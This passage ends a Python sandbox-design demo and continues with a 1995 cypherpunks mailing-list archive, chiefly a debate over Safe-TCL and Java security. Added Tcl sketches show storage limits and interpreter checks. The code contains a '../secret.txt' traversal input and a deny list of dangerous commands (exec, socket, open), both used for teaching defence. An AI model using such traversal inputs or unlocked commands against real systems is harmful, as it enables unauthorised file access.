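        if os.path.commonpath([root, real]) != root:
            raise PermissionError("outside sandbox: " + path)
        return read_file(real)

    return reader


def declare_harmless(interp, name, func):
    """Model of re-adding a command to a restricted interpreter."""
    interp.commands[name] = func


def deliver(script, restricted, trusted):
    """Application code that is meant to run scripts in `restricted` only."""
    return restricted.eval(script)


def deliver_checked(script, restricted, trusted):
    """Same, but refuses to run untrusted input in a trusted interpreter."""
    if restricted.trusted or not trusted.trusted:
        raise PermissionError("interpreter arguments are swapped")
    return restricted.eval(script)


def demo():
    """Build a sandbox directory and run the same script under each design."""
    results = {}
    with tempfile.TemporaryDirectory() as top:
        box = os.path.join(top, "box")
        os.mkdir(box)
        for path, text in ((os.path.join(box, "note.txt"), "public"),
                           (os.path.join(top, "secret.txt"), "secret")):
            with open(path, "w") as fh:
                fh.write(text)
        trusted = Interp(True, readfile=read_file)
        removed = Interp(False)                              # design 1: command absent
        guarded = Interp(False, readfile=guarded_read(box))  # design 2: run-time check
        script = "readfile " + os.path.join(box, "..", "secret.txt")
        results["guarded_inside"] = guarded.eval(
            "readfile " + os.path.join(box, "note.txt"))
        attempts = {
            "removed": lambda: removed.eval(script),
            "guarded_escape": lambda: guarded.eval(script),
            # Caller bug: the two interpreter arguments are passed in reverse.
            "swapped": lambda: deliver(script, trusted, removed),
            "swapped_checked": lambda: deliver_checked(script, trusted, removed),
        }
        for label, attempt in attempts.items():
            try:
                results[label] = attempt()
            except (NameError, PermissionError) as exc:
                results[label] = type(exc).__name__
        # Once the command is declared back in, design 1 no longer protects.
        declare_harmless(removed, "readfile", read_file)
        results["after_declare"] = removed.eval(script)
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(label, "->", outcome)
```

Neither design survives the argument swap on its own, because both interpreters live in one process; the tag check in `deliver_checked` is a stand-in for the separation that a separate process or chroot would give.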



 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 3 Aug 95 22:32:46 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Appropriate Topics?
In-Reply-To: <ac46a6d9010210043f4a@[205.199.118.202]>
Message-ID: <199508040532.BAA08605@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 8:35 PM 8/3/95, Ray Cromwell wrote:
> 
> >> Good idea.
> >>
> >> I would have some suggestions, but first
> >> an important question:
> >>
> >> Is it to be discussed on the Cypherpunks list?
> >
> >  I don't see why not. It's related to crypto, and it's related to
> >writing code. Or has the cypherpunks list degenerated into an arena
> >where the top subjects are the Waco hearings, paranoid government/NSA
> >rumors, US vs German censorship, and irrelevant political messages?
> 
> As I see things, talking about Ray's ideas for an object-oriented crypto
> library is a big part of what this list is for. (Ditto for Wei Dai's code,
> for Hal's code, and so on.)
> 
> However, it's a mistake to think that the _only_ thing appropriate for the
> list is talking about code (of either kind). Not that Ray said this.

  Right, I wasn't saying that. I was being sarcastic. I have my mailbox
filled up everyday by noisy messages like that PBS under the
Republican's post (which is old, I saw it months ago), discussions of
the newest conspiracy behind the Randy Weaver incident, etc, without
uttering a peep. I just hit 'd' and go on. So I post a message about
crypto and coding, and all of a sudden I get accused of not being
on topic. I obviously put some time and thought into my message,
I experienced a weird sort of ironic feeling when I saw the comment
(about being off topic) Kinda like, "what is this world coming to
when an annoying 800 line policy analysis forward, and discussions
of the OJ trial are considered 'signal'"

 I don't think the only valuable contribution to c'punks is writing code,
in fact, I'm not writing code, I'm discussing theoretical abstractions.
All kinds of posting types from t-shirts, to meetings, to
political activism are valuable. In order to write code, you must
think about and discuss what you are going to write first.  In order
to fight politically, you must have discussion and debate. What I don't
think is valuable are these massive forwards, subscriptions of cypherpunks
to Web servers, and 2-line followups with snide remarks.

  Decrease the entropy. ;-)


-Ray


  
  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@tyrell.net>
Date: Fri, 4 Aug 95 04:42:44 PDT
To: mnorton@cavern.uark.edu
Subject: Noise: PBS under the Republicans (fwd)
In-Reply-To: <Pine.SOL.3.91.950803180422.29640D-100000@cavern>
Message-ID: <199508041138.AA22941@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Thu, 3 Aug 1995 18:04:50 -0500 (CDT)
   From: Mac Norton <mnorton@cavern.uark.edu>
   Mime-Version: 1.0
   Content-Type: TEXT/PLAIN; charset=US-ASCII
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk



   On Thu, 3 Aug 1995, Perry E. Metzger wrote:

   > 
   > What, exactly, does this have to do with cryptography?
   > 
   > .pm

   If you have to ask, you can't afford it.

   MacN

Oh, I get it! PBS is a steganography engine for all of those
big foundations?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 4 Aug 95 05:34:55 PDT
To: cypherpunks@toad.com
Subject: PRA_fix
Message-ID: <199508041234.IAA00106@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-4-95. NYPaper:


   "A Contract Is Awarded To Improve Navigation."

      The Federal Aviation Administration yesterday awarded a
      contract to greatly improve a navigation system that
      would let civilians pinpoint their locations anywhere in
      the United States to within 21 feet.

      The augmentation would consist of 36 receiving stations
      in the United States, each fixed in a precisely surveyed
      spot. Each station would listen electronically for the
      signals given off by the halo of satellites, and
      calculate what the satellites were saying about the
      station's location. But the station, bolted down, would
      not rely on the satellites to determine its location; it
      would already know that precisely.

      The central office, listening to all 36 stations, would
      establish a correction factor. It would radio the
      correction factor to a different satellite, one in
      geosynchronous orbit over the United States, meaning
      that its position did not change relative to the earth's
      surface.

      The geosynchronous satellite would radio a correction
      factor back to planes in flight, or any other user. The
      plane would also receive signals from the G.P.S.
      satellites, calculate a position, apply the correction
      factor and fix its location.


   PRA_fix











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 4 Aug 95 05:40:37 PDT
To: cypherpunks@toad.com
Subject: WYE_not
Message-ID: <199508041240.IAA00566@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Absent crypto, but present priv-gov fee-fame combat:

   The New Yorker of July 31 writes on the indictment of six
   lawyers in Miami on drug-conspiracy charges.


   "The Thin White Line: Federal indictment in Miami depicts
   six defense lawyers as virtual traitors in the war on
   drugs. Is the government overreaching?"


   WYE_not (about 28K, in two parts)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 4 Aug 95 05:43:34 PDT
To: cypherpunks@toad.com
Subject: SURVEY: Money on the Internet
Message-ID: <v02120d00ac47c59cf12f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I saw this in sci.econ. I filled it out, but mostly I'm interested in the
results.  The survey seems pretty thorough, mostly crypto-aware, and it
includes a question about the value of anonymity...

Cheers,
Bob Hettinga


: From: weiler@ic.ac.uk (Mr R.M. Weiler)
: Newsgroups: sci.econ
: Subject: SURVEY: Money on the Internet
: Date: 31 Jul 1995 11:15:02 GMT
: Organization: Imperial College of Science, Technology and Medicine, London
: Lines: 18
: Sender: r.m.weiler@ic.ac.uk
:  Followup-To:
: Message-ID: <3vidvm$lnm@oban.cc.ic.ac.uk>
: NNTP-Posting-Host: sg1.cc.ic.ac.uk
:
: Hi there!
:
: I am doing a research on the use of money on the Internet. I would
: appreciate it if you could answer a short survey on this subject, found at
: the following Web site:
:
:        http://graph.ms.ic.ac.uk/money
:
: I would also appreciate any remark on this survey. Please tell your friend
: about it, too.
:
: Many thanks!
:
: Roy Weiler
: The Management School
: Imperial College
: e-mail: r.m.weiler@ic.ac.uk

--
Robert Hettinga (rah@shipwright.com)  "There is no difference between
Shipwright Development Corporation     someone who eats too little
44 Farquhar Street                     and sees Heaven and someone
Boston, MA 02331 USA                   who drinks too much and sees
(617) 323-7923                         snakes."   -- Bertrand Russell
Phree Phil: Email: zldf@clark.net http://www.netresponse.com/zldf






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Fri, 4 Aug 95 05:46:47 PDT
To: cypherpunks@toad.com
Subject: FIPS number for SHA - The Next Generation
Message-ID: <199508041246.IAA11750@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Since I last asked a while back, have the folks at NIST published a
new version of the SHA FIPS with the small modifications made to it to
"repair" the defect?  I need the information for an RFC that is being
submitted to the RFC editor today so it's kind of important...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Thu, 3 Aug 95 15:53:01 PDT
To: Jason Weisberger <jweis@primenet.com>
Subject: Re: SSLeay - Whats the story...
In-Reply-To: <199508032140.OAA09085@usr2.primenet.com>
Message-ID: <Pine.HPP.3.91.950804083519.1790B-100000@saturn.mincom.oz.au>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 3 Aug 1995, Jason Weisberger wrote:
> Maybe I miss it, but when did this arrive?  Is anyone testing it?

I started writing the library back at the start of April.
It has been available for ftp for a month or 2 now but I'm still working
on it.  I have only mentioned it on a few mailing lists and am holding
off its announcement on sci.crypt until we have the Windows 3.1 DLL working
fully (well, we have it working now but I'm still cleaning things up a
bit :-).  It even compiles under DOS :-)

It is a free (for commercial and non-commercial use) complete
implementation of Netscape's SSL v 2.  The SSL part of the library is
quite small, most of the rest is support routines for the x509 
environment. I have routines for DES (my libdes library), RC4, IDEA, RSA, 
MD2, MD5.  I have support routines to generate RSA private keys and I 
have programs to generate, and certify x509 certificates.
Tim Hudson has put SSL in ftp, telnet, Mosaic, httpd etc.  These patches
are available from the same ftp site.
For those in the USA, you can build to use RSAref and can build with RC4 
and or IDEA removed.

All code in this 'library' has been written by me from publicly
available material.  Documentation of the non SSL part is quite small 
since I have mostly been coding and nearly all of this work has been done 
outside of my normal work hours.

People have been using the library quite a bit, and we can interoperate 
with netscape secure servers and their clients (if we have a certificate 
signed by netscape).

Have a play and please send me any comments :-)

http://www.psy.uq.oz.au/~ftp/Crypto/
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps/

eric

--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 4 Aug 95 05:55:45 PDT
To: cypherpunks@toad.com
Subject: Re: PRA_fix
Message-ID: <v02120d01ac47c6952bb7@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>   8-4-95. NYPaper:
>
>
>   "A Contract Is Awarded To Improve Navigation."
[snip]
>      The geosynchronous satellite would radio a correction
>      factor back to planes in flight, or any other user. The
>      plane would also receive signals from the G.P.S.
>      satellites, calculate a position, apply the correction
>      factor and fix its location.

This is called an active location system, and it was originally designed by
G.K. O'Neill (The Princeton Physics Prof., Space Studies Institute founder,
the guy who came up with all those spiffy space-settlement ideas in the
late seventies -- see Babylon 5 for a picture ;-) -- and the inventor of
the mass driver, among other things), under the name of Geostar, in the
early 1980's. Its accuracy was supposed to be 6 inches in 2 dimensions,
and 6 feet in 3 dimensions.  The FAA didn't like it because they didn't
invent it, the DOD hated it because they wanted to commercialize GPS and
they didn't want anything so accurate for civilian purposes.  The
transponders were going to be beensy little things about the size of pagers
relying on high-energy burst transmissions.

ObCrypto/Privacy: It relied on a fast computer on the ground to calculate
where you were, it allowed short messages, and presumably it was going to
send them in the clear. It also had a "panic" button function, where
someone in trouble could summon help no matter where they were.

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Fri, 4 Aug 95 06:10:51 PDT
To: strick at Jihad <strick@yak.net>
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <199508032138.VAA00125@jihad.yak.net>
Message-ID: <199508041310.JAA02958@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



strick at Jihad writes:
> Perry -- do you have the same basic objection to Safe-TCL that you
> do to Java?  I would think so.

I do, but not as strongly. The language is much more constrained and
actually does have a lot of the evil bits ripped clear out (or at
least they could be ripped out.)

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 4 Aug 95 10:02:55 PDT
To: cypherpunks@toad.com
Subject: Re:  Java and Safe-TCL security
Message-ID: <199508041701.KAA10421@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The safe-tcl mailing list has not been active for a few months.  I think
a lot of interest has transferred to Java.  One problem is that safe-tcl
was oriented around email, so it lacks facilities for accessing web
pages.

I agree with Ray that the security of safe-tcl leaves something to be
desired.  I implemented a safe-tcl mail filter which would automatically
run incoming mail scripts which were in safe-tcl format.  This would be a
generalization of a remailer, so that users could write scripts which
would determine when the remailing would occur, etc.  However I ran into
a number of problems, particularly related to persistent storage (e.g.
disk file access).  This is a hard problem for a "safe" system to solve.

One solution is to just forbid it, but beyond that you need to have rules
about how much disk space a script can use, whether they can access each
other's space, etc.  There are some nice applications if they can do so,
for example the telescript model where two software agents come together
and exchange some information.

Another tricky issue is if you are going to let the script talk to the
outside world via email or tcp connections.  How do you prevent abuse of
this feature (sending junk email, or connecting to a web page and
entering bogus data into a form)?  But again, without this capability the
script is pretty much limited to drawing pretty pictures on your screen,
which isn't very useful.

Here is one message I sent to the safe-tcl list earlier this year
describing some of these problems in a little more detail.  Note that
there were also several bugs in the implementation which left security
holes, things being checked in the wrong context and such.  This is
similar to what Ray was citing.

Hal

> From owner-safe-tcl@CS.UTK.EDU  Fri Feb 10 22:30:35 1995
> X-Resent-To: safe-tcl@CS.UTK.EDU ; Sat, 11 Feb 1995 01:22:02 EST
> Date: Fri, 10 Feb 1995 22:21:28 -0800
> From: Hal <hfinney@shell.portal.com>
> To: safe-tcl@CS.UTK.EDU
> Subject: setconfigdata and delivery time
> Status: R
> 
> The spec appears to allow delivery-time scripts to do setconfigdata.
> This is a mechanism for a script to store persistent data.  One application
> would be a telescript-like interaction between scripts.  Some data could
> be stored by one script and later read by another.  More interesting, a
> script could even store some script, perhaps some or all of itself, into this
> persistent store.  That script could then be read and eval'd by a later
> script.  This way scripts could in effect call subroutines in each other,
> providing somewhat similar functionality to telescript's procedure calls
> between agents.
> 
> At activation time the user gets asked whenever a script does
> getconfigdata, although oddly not when a script does setconfigdata.
> Also, the .safetcl.conf file is written on any getconfigdata after the
> user has supplied or confirmed a database value.  This will have the
> side effect of writing out any setconfigdata values which have been
> previously set by the script.
> 
> At delivery time the current implementation will not ask the user since
> there is no user to ask, which causes the writing out of the config data
> base never to happen.  So there is actually no way for a delivery time
> script to set a persistent value right now.  It would be easy to change
> the code to allow delivery time scripts to set persistent values with
> setconfigdata.
> 
> However, this does open up a possible avenue for abuse.  There is
> presently no limit on how much data is written with setconfigdata.  And
> actually if the idea above were used where scripts put themselves into
> the database for later running then the database could legitimately be
> quite large.  The problem would arise if a script abused this capability
> by filling the disk with junk database entries.
> 
> Maybe something is needed analogous to AutoConfirmMailHook to determine
> whether a given SafeTcl_setconfigdata should be able to go out to the
> disk.  It would want to be given the data as input and possibly also
> the size of the current database.  Maybe there should be a counter of how
> many times the current script has written to the database (or perhaps the
> hook could retain this information itself).
> 
> Two other points: as mentioned before the use of the database to retain
> "system" information conflicts with its use for this purpose.  If
> database entries like "mailer" or "external-site" are changed and saved
> to .safetcl.conf, that could break later invocations of swish.  I think
> this system data should be somewhere else (or else there needs to be
> another form of persistent store for scripts).
> 
> Secondly, the code right now checks the SafeTcl_evaluation_time
> variable in the restricted interpreter to decide whether it should ask
> the user.  This is not reliable as the untrusted script could change
> SafeTcl_evaluation_time.  In other places the code checks
> SafeTcl_InterfaceStyle and if it is empty then it doesn't ask.  That
> seems safer.
> 
> Hal Finney
> hfinney@shell.portal.com
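
The two suggestions in the quoted message (a confirmation hook that sees the data and the database size, and keeping the evaluation-time check out of the untrusted script's reach) can be sketched as follows. This is an added example using stock Tcl 8.5+ safe interpreters, not code from Safe-Tcl or swish; the `store` namespace, its limits and the sample script are assumptions made for the illustration.

```tcl
# Added illustration: stock Tcl safe interpreters, not Safe-Tcl/swish code.
# Every name and limit below is an assumption chosen for the example.
namespace eval store {
    variable db                         ;# the persistent store (in memory here)
    array set db {mailer /usr/lib/sendmail}
    variable reserved {mailer external-site}   ;# "system" keys scripts may not change
    variable maxValueBytes 1024
    variable maxDbBytes    4096
    variable budget                     ;# writes allowed per evaluation time
    array set budget {delivery 2 activation 8}
    variable state                      ;# state(interp,time), state(interp,writes)
    array set state {}
}

proc store::bytes {s} { string length [encoding convertto utf-8 $s] }

proc store::dbBytes {} {
    variable db
    set n 0
    foreach {k v} [array get db] { incr n [expr {[bytes $k] + [bytes $v]}] }
    return $n
}

# Hook in the spirit of AutoConfirmMailHook: it sees the key, the data and the
# current database size, and returns "" to allow the write or a reason to refuse.
proc store::confirmHook {interp key value} {
    variable db; variable reserved; variable maxValueBytes
    variable maxDbBytes; variable budget; variable state
    # Evaluation time and write count come from the master's table, never from
    # a variable inside the restricted interpreter that the script can overwrite.
    set time $state($interp,time)
    if {$key in $reserved} { return "\"$key\" is a reserved system key" }
    if {[bytes $value] > $maxValueBytes} { return "value exceeds $maxValueBytes bytes" }
    if {$state($interp,writes) >= $budget($time)} {
        return "$time-time write budget of $budget($time) used up"
    }
    set old 0
    if {[info exists db($key)]} { set old [expr {[bytes $key] + [bytes $db($key)]}] }
    set projected [expr {[dbBytes] - $old + [bytes $key] + [bytes $value]}]
    if {$projected > $maxDbBytes} { return "database would grow to $projected bytes" }
    return ""
}

# Master-side implementation behind the script's setconfigdata command.
proc store::put {interp key value} {
    variable db; variable state
    set why [confirmHook $interp $key $value]
    if {$why ne ""} { return -code error "setconfigdata refused: $why" }
    set db($key) $value
    incr state($interp,writes)
    return
}

# Create a restricted interpreter and record its evaluation time in the master.
proc store::newScript {evalTime} {
    variable state
    set i [interp create -safe]
    set state($i,time) $evalTime
    set state($i,writes) 0
    interp alias $i setconfigdata {} ::store::put $i
    return $i
}

# Constructed untrusted script, run as a delivery-time script.
set script {
    # Overwriting this variable changes nothing: the master never reads it.
    set SafeTcl_evaluation_time activation
    set out {}
    foreach {k v} [list note hello mailer /bin/false big [string repeat x 2000] a 1 b 2] {
        if {[catch {setconfigdata $k $v} msg]} {
            lappend out "$k: $msg"
        } else {
            lappend out "$k: stored"
        }
    }
    set out
}
set s [store::newScript delivery]
foreach line [interp eval $s $script] { puts $line }
interp delete $s
```

Only `note` and `a` reach the store; the reserved key, the oversized value and the third write are refused even though the script has set its own `SafeTcl_evaluation_time` to `activation`.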




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Russell Whitaker <whitaker@sgihub.corp.sgi.com>
Date: Fri, 4 Aug 95 10:07:03 PDT
To: cypherpunks@toad.com
Subject: SuperMac Sentinel: Customer Support tale
Message-ID: <199508041706.KAA20363@extropia.csd.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


jfg@fuente.engr.sgi.com (John Gibbon) wrote:
>I got this from a friend, who got it from a friend, 
>	who got it from a friend ...
>
> --------------------------------------
>SuperMac records a certain number of technical support calls at
>random, to  keep tabs on customer satisfaction.  By wild "luck", they
>managed to catch the following conversation on tape.
>
>Some poor SuperMac TechSport got a call from some middle level
>official from the legitimate government of Trinidad.  The fellow spoke
>very good English, and fairly calmly described the problem.
>
>It seemed that there was a coup attempt in progress at that moment. However,
>the national armoury for that city was kept in the same building as
>the Legislature, and it seems that there was a combination lock on the
>door to the armoury. Of the people in the capital city that day, only
>the  Chief of the Capitol Guard and the Chief Armourer knew the
>combination to the lock, and they had already been killed.
>
>So, this officer of the government of Trinidad continued, the problem
>is this.  The combination to the lock is stored in a file on the
>Macintosh, but the file has been encrypted with the SuperMac product
>called Sentinel.  Was there any chance, he asked, that there was a
>"back door" to the application, so they could get the combination,
>open the armoury door, and defend the Capitol Building and the
>legitimately elected government of Trinidad against the insurgents?
>
>All the while he is asking this in a very calm voice, there is the
>sound of gunfire in the background. The Technical Support guy put the
>person on hold.
>
>A phone call to the phone company verified that the origin of the call
>was in fact Trinidad.  Meanwhile, there was this mad scramble to see
>if anybody knew of any "back doors" in the Sentinel program. As it
>turned out, Sentinel uses DES to encrypt the files, and there was no
>known back door.  The Tech Support fellow told the customer that aside
>from trying to guess the password, there was no way through Sentinel,
>and that they'd be better off trying to physically destroy the lock.
>
>The official was very polite, thanked him for the effort, and hung up.
>That night, the legitimate government of Trinidad fell.  One of the
>BBC reporters mentioned that the casualties seemed heaviest in the
>capitol, where for some reason, there seemed to be little return fire
>from the government forces.
>
>
>


-- 
Russell Earl Whitaker	                       whitaker@sgi.com
Webmaster, Silicon Junction			   
Silicon Graphics, Inc.	                      Mountain View, CA
===============================================================
http://reality.sgi.com/employees/whitaker



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NSA Spook <remailer@spook.alias.net>
Date: Fri, 4 Aug 95 08:39:48 PDT
To: toad.com.mix-l@jpunix.com.rops-l@c2.org
Subject: to usura
Message-ID: <199508041537.KAA14043@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


usura
cfs coming
send note to list if you receive




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 4 Aug 95 07:59:58 PDT
To: perry@piermont.com
Subject: Java and Safe-TCL security (was Re: Java, Netscape, OpenDoc, and Babel)
In-Reply-To: <199508041310.JAA02958@panix4.panix.com>
Message-ID: <199508041459.KAA11345@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> strick at Jihad writes:
> > Perry -- do you have the same basic objection to Safe-TCL that you
> > do to Java?  I would think so.
> 
> I do, but not as strongly. The language is much more constrained and
> actually does have a lot of the evil bits ripped clear out (or at
> least they could be ripped out.)

  The same applies to Java. Anything can be ripped out of Java by removing
the classes with the "native" methods on the local side. The class loader
will barf at an object that references a class that doesn't exist. In fact,
since that class contains the only way possible to access that privilege
(it encapsulates all the nasty unix system calls you don't want to allow)
there is no way for the untrusted code to call for instance, open(),
because it doesn't know the address of it. Java does compile-time
emasculation. (the compiler I'm speaking of is the Java compiler which
must be run from the shell. The compiler is not a part of the browser)


Now Safe-TCL has another mode of failure altogether. First of all, the way
the interpreter is made "safe" is to take a fully working tcl interpreter
(with full privileges) at run time, and use TclDeleteCommand() to remove
offending commands. Safe-TCL is not emasculated at compile time, but at
run time. Now what if this removal-of-dangerous-commands process fails
sometime, or fails to remove just a single command, because of say, a
fence-post error, and that command just happens to be 'exec'?
Furthermore, two interpreters are created, a "safe" one and an "unsafe"
one. It is very possible for a programmer to accidentally pass the pointer
to the wrong interpreter. You should be nervous of an unsafe interpreter
ever existing at all.
 

Lastly, "declareharmless" allows privileges to be added to Safe-TCL at
run time, vs Java which only allows that by recompiling Java classes.
If by any means, a trusted interpreter ever gets to execute this command,
all is lost.


One last comment: Java is a language specification, not an implementation
specification. Sun wants Java to be a free and open language with other
vendors creating compilers and runtime environments. Whether or not
the Java runtime executes in a separate process space, chrooted(), etc
is an implementation detail. In fact, I'm not totally sure that Hotjava
doesn't do this already. Implementation details are not documented in
the Java papers available at the Java home page.


You have to read more than just the Java whitepaper to get an estimation
of its security. 

-Ray
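
The two failure modes named above (a removal loop that misses one command, and untrusted code handed to the wrong interpreter) can both be caught by a check that runs after the interpreter is built and before any untrusted script is evaluated. The following is an added example using stock Tcl `interp` commands, not Safe-Tcl's own code; the proc names, the removal list and the off-by-one loop are constructed for the illustration.

```tcl
# Added illustration: stock Tcl interp commands, not Safe-Tcl source.
# Commands the restricted interpreter must not expose (constructed list).
set deny {open socket glob cd load source exec}

# The run-time approach described in the message: start from a full
# interpreter and delete commands. The loop bound is deliberately wrong
# (a fence-post error), so the last entry, exec, is never removed.
proc stripByDenylist {deny} {
    set i [interp create]
    for {set n 0} {$n < [llength $deny] - 1} {incr n} {
        interp eval $i [list rename [lindex $deny $n] {}]
    }
    return $i
}

# Post-condition check, independent of the removal loop: ask the interpreter
# itself which of the forbidden commands it can still resolve.
proc survivors {interp deny} {
    set left {}
    foreach cmd $deny {
        if {[interp eval $interp [list info commands $cmd]] ne ""} {
            lappend left $cmd
        }
    }
    return $left
}

# Single entry point for untrusted code. It refuses any interpreter that was
# not created safe (guards against passing the wrong handle) and any
# interpreter in which a forbidden command is still visible.
proc evalUntrusted {interp deny script} {
    if {![interp issafe $interp]} {
        error "refusing: $interp is not a safe interpreter"
    }
    set left [survivors $interp $deny]
    if {[llength $left]} {
        error "refusing: still exposed in $interp: $left"
    }
    interp eval $interp $script
}

set stripped [stripByDenylist $deny]
puts "left behind by the removal loop: [survivors $stripped $deny]"
if {[catch {evalUntrusted $stripped $deny {expr {6 * 7}}} msg]} { puts $msg }
interp delete $stripped          ;# fail closed: discard it, do not patch it up

set safe [interp create -safe]
puts "safe interpreter result: [evalUntrusted $safe $deny {expr {6 * 7}}]"
interp delete $safe
```

The check reports `exec` as the command the loop left behind, and `evalUntrusted` rejects the stripped interpreter outright because it was never created with `-safe`.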
  


 
 

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Thu, 3 Aug 95 20:45:17 PDT
To: Jason Weisberger <jweis@primenet.com>
Subject: Re: SSLeay - Whats the story...
In-Reply-To: <199508032140.OAA09085@usr2.primenet.com>
Message-ID: <Pine.LNX.3.91.950804104356.9665A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Aug 1995, Jason Weisberger wrote:

> Maybe I miss it, but when did this arrive?  Is anyone testing it?

You may take a look at http://www.psy.uq.oz.au/~ftp/Crypto/

My initial enthusiasm has somewhat vanished when I've realized that a 
free SSL implementation doesn't automatically allow one to build a 
Netsite-compatible server: without a certificate issued by Verisign on 
behalf of Netscape Communications, Netscape Navigator won't talk to it.
As SSL has some intrinsic points of weakness, I don't see the point
of sticking to it to secure the TCP layer.
For details, see also http://petrified.cic.net/~altitude/ssl/ssl.saga.html

On the other hand, the CryptoTCP approach (see the file ctcp.0.9.tar.gz
at ftp://utopia.hacktic.nl/pub/crypto) looks promising. Is anybody 
working on it? I'm interested in exchanging ideas, as I'm thinking
of adding CryptoTCP client capabilities to a SOCKS 4.2 daemon. 
I see three major areas for improvement:

1. A better PRNG for the session key
2. Authentication of the D-H key exchange with digital signatures, a` la 
Photuris
3. Less "hard-wired" structure: at present, for example, the module size 
for D-H calculations is fixed at 1024 bits.

1. and 2. are relatively easy, but 3. would require a lot of work.

Also, being able to negotiate different encryption algorithms in addition 
to triple-DES wouldn't be bad.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Brenton" <Chris.Brenton@newsedge.com>
Date: Fri, 4 Aug 95 08:59:51 PDT
To: cypherpunks@toad.com
Subject: to usura
Message-ID: <9508041202.AA14456@herne.newsedge.com>
MIME-Version: 1.0
Content-Type: text/plain


Original-From: NSA Spook <remailer@spook.alias.net>
Original-Date: Fri, 4 Aug 1995 10:37:00 -0500


>usura
>cfs coming
>send note to list if you receive

Thank you for posting this to the list. 

I needed some more useless mail...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ACLUNATL@aol.com
Date: Fri, 4 Aug 95 09:42:23 PDT
To: ACLUNATL@aol.com
Subject: House Adopts Exon-Like Speech Crimes, Also Adopts Cox/Wyden Amendment
Message-ID: <950804121746_47881732@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


8/4/95 
ACLU Cyber-Liberties Alert: 
House Adopts Exon-Like Speech Crimes,
Also Adopts Cox/Wyden Amendment
--------------------------------------------------------- 
At 9:10 am today, the House of Representatives voted to adopt an omnibus
"Managers Amendment" to the telecommunications bill (HR 1555), which included
new Exon-like speech crimes that would censor the Internet.   At 11:58 am,
the House of Representatives voted 420 to 4 to adopt the Cox/Wyden amendment
to the telco bill.  The Cox/Wyden amendment, however, was not designed to --
and does not -- affect the Exon-like speech crimes provisions added to the
telco bill by the House.

Speech Crimes Provisions in Managers Amendment:

The  Managers Amendment containing the new speech crimes provisions also
contained some forty other unrelated amendments.  The Exon-like provisions
were not a focus of the debate, and it is likely that most members cast their
votes for reasons unrelated to these provisions.

The Managers Amendment adds an entirely new Exon-like provision to the
existing federal obscenity laws. The provision would make it a crime to
"intentionally communicate by computer ... to any person the communicator
believes has not attained the age of 18 years, any material that, in context,
depicts or describes, in terms patently offensive as measured by contemporary
community standards, sexual or excretory activities or organs."  (18 U.S.C.
1465)

This provision, like the Exon amendment passed by the Senate, would
effectively reduce all online content to that which is suitable only for
children.  It also raises the same questions about service provider
liability that were raised by the Exon amendment.

The Managers Amendment would also make it a crime to "receive" prohibited
material "by computer," thereby subjecting both Internet users and service
providers to new prosecutions (18 U.S.C. 1462).

Assuming that the House telco bill (HR 1555) is approved (which is highly
probable by 3 pm today), both the House and Senate versions of the telco bill
will include severe attacks on cyber-liberties.

Cox/Wyden Amendment:

The ACLU has supported the general approach of the Cox/Wyden amendment
because it prohibits FCC regulation of content on the Internet and generally
supports private sector initiatives, not government censorship, on
cyberspace.  As the ACLU has said before, there are several ambiguities and
some real problems with the Cox/Wyden amendment.  The two sponsors have
committed to working with us on resolving the problems.  (See previously
